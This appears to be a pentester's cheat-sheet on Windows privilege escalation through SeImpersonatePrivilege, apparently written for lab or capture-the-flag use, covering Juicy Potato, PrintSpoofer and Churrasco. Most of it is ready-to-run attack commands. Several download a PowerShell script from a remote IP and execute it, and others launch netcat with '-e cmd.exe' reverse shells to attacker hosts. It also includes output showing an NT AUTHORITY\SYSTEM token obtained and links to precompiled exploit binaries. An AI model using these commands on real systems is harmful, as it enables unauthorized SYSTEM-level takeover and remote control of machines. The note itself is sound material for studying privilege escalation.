SeTokenImpersonate

How to Test ? whoami /priv if seimpersonate token enabled very old machines like before 2008 ,windows 2003 :: - chimmi churi , chuarsco latest andrecent 64 bit ::- printspoofer preccompiled in between these :: rotten potato, juicy potato etc. both for 32 as well as 64 bits then juicy potato / printspoofer etc. printspoofer only works for x64 architecture for x86 try juicy potato reference links :: https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#seimpersonateprivilege-3-1-1 pre compiled printspoofer exe x64: https://github.com/dievus/printspoofer pre compiled juicy potato x86: https://github.com/ivanitlearning/Juicy-Potato-x86/releases https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---impersonation-privileges https://www.puckiestyle.nl/token-impersonation/

How to Use Juicy Potato?

Spawning a PS rev shell :: JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.18/psrvsh.ps1')" -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30} -a for cli arguments u want to pass for -c flag you need https://github.com/ohpe/juicy-potato/tree/master/CLSID (select your target os as per version and select any clsid , one by one try all see which one works) Try all of them one by one see which one works ::

JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"

Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 ...... [+] authresult 0 {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK

How to Use Churrasco?

https://github.com/Re4son/Churrasco/blob/master/ReadMe.txt churassco.exe -d "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 10.10.14.15 5353" -d for command to run ^cmd simple one liner nc reve shell